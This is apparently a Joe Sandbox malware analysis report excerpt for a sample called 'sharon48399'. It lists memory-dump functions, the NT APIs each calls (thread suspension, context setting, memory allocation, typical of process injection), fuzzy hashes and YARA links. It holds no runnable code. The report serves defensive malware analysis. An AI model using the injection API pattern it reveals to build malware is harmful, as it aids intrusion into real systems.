Opcode Fuzzy Hash: adff89788c227dfb02b330619a6bccec0f9c373fd36e43cb928eaab211708a8b
Instruction Fuzzy Hash: CD712C71D14158DFCB05CFA9C890AEDBBB1BF49304F1881AAE859B7341D738A946CF98

Function 0040BFD3 Relevance: 1.7, APIs: 1, Instructions: 178
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040C12D

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: af22745c9356b21275a4ed7ec95143a4cc00c792e14a36387ff7ba92eb16b96b
Instruction ID: 8143565c1ed0993058e6d586fa4036d4e587653beb669d54d7f95b9336940cd5
Opcode Fuzzy Hash: af22745c9356b21275a4ed7ec95143a4cc00c792e14a36387ff7ba92eb16b96b
Instruction Fuzzy Hash: 62712F71E04158DFCB04CFA9C890AEDBBF1BF49304F18816AE859BB341D638A946CF55

Function 0040AA93 Relevance: 1.7, APIs: 1, Instructions: 170
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetContextThread.NTDLL(?,?), ref: 0040ABDD

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 7d3590489634a5643a165557ae1e62707ac94800af8139a2bf38665b0a25d032
Instruction ID: d4e5869915a99125bcdad7944eea00a2bf72dfbca1512e106d76b181c7b9fddb
Opcode Fuzzy Hash: 7d3590489634a5643a165557ae1e62707ac94800af8139a2bf38665b0a25d032
Instruction Fuzzy Hash: DC718F71E04258DFCB04CFA9C490AEDBBF2BF49304F18806AE419BB341D638A956DF55

Function 0040BBB3 Relevance: 1.7, APIs: 1, Instructions: 170
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDelayExecution.NTDLL(0041C291,?,?,?,00000000), ref: 0040BCFE

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 10f784cb7a7465b49218334df4e70ac1398cacb19b884e6fb5fd4ed04110ac16
Instruction ID: 224df048350992204dea636a9cf2136097186a6e34023e583b2a4fcadb8b91eb
Opcode Fuzzy Hash: 10f784cb7a7465b49218334df4e70ac1398cacb19b884e6fb5fd4ed04110ac16
Instruction Fuzzy Hash: CC712E71E04258DFCB05CFA9C490AEDBBF1AF49304F1880AAE855B7341D738AA45DF99

Function 0040ACA3 Relevance: 1.7, APIs: 1, Instructions: 170
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL(004071D5,?,?,?,?), ref: 0040ADED

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e82c6908598d20ec0be45675678c3b10373641ab3eec8e70e69c302ce30f2250
Instruction ID: b6f10511c00207d67f0fbc32bcefce55cc479fdc692c5c7557564370438ddd56
Opcode Fuzzy Hash: e82c6908598d20ec0be45675678c3b10373641ab3eec8e70e69c302ce30f2250
Instruction Fuzzy Hash: D3715F71E04258DFCB04CFA9C890AEDBBF2BF49304F18806AE859B7341D638A955CF95

Function 0040A673 Relevance: 1.7, APIs: 1, Instructions: 170
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSuspendThread.NTDLL(?,?), ref: 0040A7BD

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: SuspendThread
String ID:
API String ID: 3178671153-0
Opcode ID: df1744cd3ab3c9e63664b9d7c7920faaf1bd56dff2a6f15b324ade073ee0abe8
Instruction ID: e0512f439ae47d9be5cbe886a187579ca4bcb7003b3baa994f3caa2f25e50319
Opcode Fuzzy Hash: df1744cd3ab3c9e63664b9d7c7920faaf1bd56dff2a6f15b324ade073ee0abe8
Instruction Fuzzy Hash: 95714F75E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE859B7341D638A956CF95

Function 00418BA3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418C15

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 1ece3eff7ef69611ee126556be6f4899efe61f532828b703a8cdf4cdaaeb4af3
Instruction ID: 3a7d3c80330e5758b3a9f81f32ca88ff767ca5b188dc6faacfe14b01834f0b54
Opcode Fuzzy Hash: 1ece3eff7ef69611ee126556be6f4899efe61f532828b703a8cdf4cdaaeb4af3
Instruction Fuzzy Hash: 470152B5E0010DB7DB10DAE5DD42FDEB7789B54308F0081AAE90897240F635EB588795

Function 0042BF43 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?), ref: 0042BF73

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
Instruction ID: d89d2c0c652fac5e8b7a6d34093b53a94ebb12e8b588f04006b5246e933adf9e
Opcode Fuzzy Hash: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
Instruction Fuzzy Hash: DBE08C723402187BC620EA5ADC42F9BB7ADDFC5B14F01405AFA08A7281D6B0B9108BF4

Function 00C107AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C107B7

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Function 00C0F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C0F9FB

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Function 00C0FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C0FAF3

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Function 00C0FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C0FB73

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Function 00C0FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C0FDCB

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Function 0041538D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(13d6pS3,00000111,00000000,00000000), ref: 0041540A

Strings

13d6pS3, xrefs: 00415411, 00415414
'oN, xrefs: 0041538D
13d6pS3, xrefs: 004153FF, 00415409, 0041541A

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 'oN$13d6pS3$13d6pS3
API String ID: 1836367815-4202519509
Opcode ID: abe8662b7715577a4b67e00549239f0ae9c7219e6112b4b4964fce852ca0655b
Instruction ID: fe34e254e3c78a2d2e75bf211c42e0671cebaf8842b7d31fa9d3e155b3f4b5cb
Opcode Fuzzy Hash: abe8662b7715577a4b67e00549239f0ae9c7219e6112b4b4964fce852ca0655b
Instruction Fuzzy Hash: E4012BB1E0011CBADB11BAE19C81DEFBB7CDF81398F408029FA14B7140E6785F058BA1

Function 00415393 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(13d6pS3,00000111,00000000,00000000), ref: 0041540A

Strings

13d6pS3, xrefs: 00415411, 00415414
13d6pS3, xrefs: 004153FF, 00415409, 0041541A

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 13d6pS3$13d6pS3
API String ID: 1836367815-3378015834
Opcode ID: 2a18f07d3b58b25007c1776e027721ed4c3c70ecef04641e0f5be156848a558b
Instruction ID: 3a74e114496ce0711f9fc21398a0d08397c93f4088640f40c2c0ae561a51f52a
Opcode Fuzzy Hash: 2a18f07d3b58b25007c1776e027721ed4c3c70ecef04641e0f5be156848a558b
Instruction Fuzzy Hash: 45012BB1E0011CBADB01BAE19C81DEF7B7CDF81398F408029FA1477140D6785F058BA1

Function 0042C1F3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,0041F3AB,?,?,00000000,?,0041F3AB,?,?,?), ref: 0042C22E

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1cd7afffb4599489c2e922e741e5df127c6c52b9574b0e89c0ec541112c06f1e
Instruction ID: d3d283629ae7dbb578c3361da26e2255cf3ead57a8e0f8df25f3f891fe741430
Opcode Fuzzy Hash: 1cd7afffb4599489c2e922e741e5df127c6c52b9574b0e89c0ec541112c06f1e
Instruction Fuzzy Hash: 48E09AB1300204BFDA10EE99EC41E9B77ADEFC9710F00001AFD08A7282CA70BD108BB9

Function 0042C243 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,FC5D89F8,00000007,00000000,00000004,00000000,004185EF,000000F0,?,?,?,?,?), ref: 0042C27E

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 84c9b89b4cdf1f602563f4f89da99040e5f52e99967f744197380856f61d1e48
Instruction ID: c9dcfcbd2332931f1569d3fe54102bcbb547f49f7c4da694ae441fffeaf01cfd
Opcode Fuzzy Hash: 84c9b89b4cdf1f602563f4f89da99040e5f52e99967f744197380856f61d1e48
Instruction Fuzzy Hash: 40E092753442047BC610EE5ADC42F9B73ADEFC5710F000419FD08A7241C670B9208BB8

Function 0042C293 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

ExitProcess.KERNELBASE(?,00000000,?,?,39D1C69F,?,?,39D1C69F), ref: 0042C2CA

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 350054d7e724a5522385e81d2f9e3944af108638e355487cb8015eeb31deba3a
Instruction ID: 632e54142e25fb71edcd38b63f987ef404ae7833aca244d52deb45822a5d22ed
Opcode Fuzzy Hash: 350054d7e724a5522385e81d2f9e3944af108638e355487cb8015eeb31deba3a
Instruction Fuzzy Hash: 5CE04F752402147BC520EA5ADC41F9B775DDFC5714F004019FA0867142CAB479158BE5

Non-executed Functions

Function 00C00080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

Strings

[Pj, xrefs: 00C000D5, 00C000C7

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID: [Pj
API String ID: 0-2289356113
Opcode ID: aefa3eb8fcc6cb463b976b4394cc09169dad12a4686d0fe84252b2d8d7a4923b
Instruction ID: 31c32d4c1ea02c88f4daffb2a1fc70a91be53117e090f190f243c22afdeb71a0
Opcode Fuzzy Hash: aefa3eb8fcc6cb463b976b4394cc09169dad12a4686d0fe84252b2d8d7a4923b
Instruction Fuzzy Hash: 1FF09071204344BBEB229B10CC85F2A7BA9AF85758F25C819F8456A0D3C772C961E721

Function 00C226F8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: e384d9412f5ff5afa7f15132e8b16e717c3e0382c0fea7d7e7eb2fafe92a0939
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: ADF0C231328569BBDB58EE1CED91A7A33D5EB94B00F64C039ED59C7A41D631DE40C290

Function 00C60101 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
Instruction ID: a85d366e5ed4176564f790e7ee47471155ce1a223ecd39948f2bc1cf8cef1267
Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
Instruction Fuzzy Hash: 83F082722442089FCB2CCF05C4D0BBE77B2AB81715F34403CE50B9F690D7359981C654

Function 00C000EA Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5552b724b4c9923cd7b571d96cbd52cdef1b823116f77c3672a66ed0bef16645
Instruction ID: 4317a81d4d25a7ee2735a676d1da5afec8740a2d984c02156e97146862f0057d
Opcode Fuzzy Hash: 5552b724b4c9923cd7b571d96cbd52cdef1b823116f77c3672a66ed0bef16645
Instruction Fuzzy Hash: EEE04FB1544B81CFD321DF14D901B1AB3F4FF89B10F25493AF80597B90D7789A09CA52

Function 00C100C4 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Function 00C10048 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CE0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000CF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.405877611.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_bf0000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Function 00C10060 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000006.00000002.405877611.0000000000BF0000.00000040.00001000.00020000.00000000.sdmpDownload File
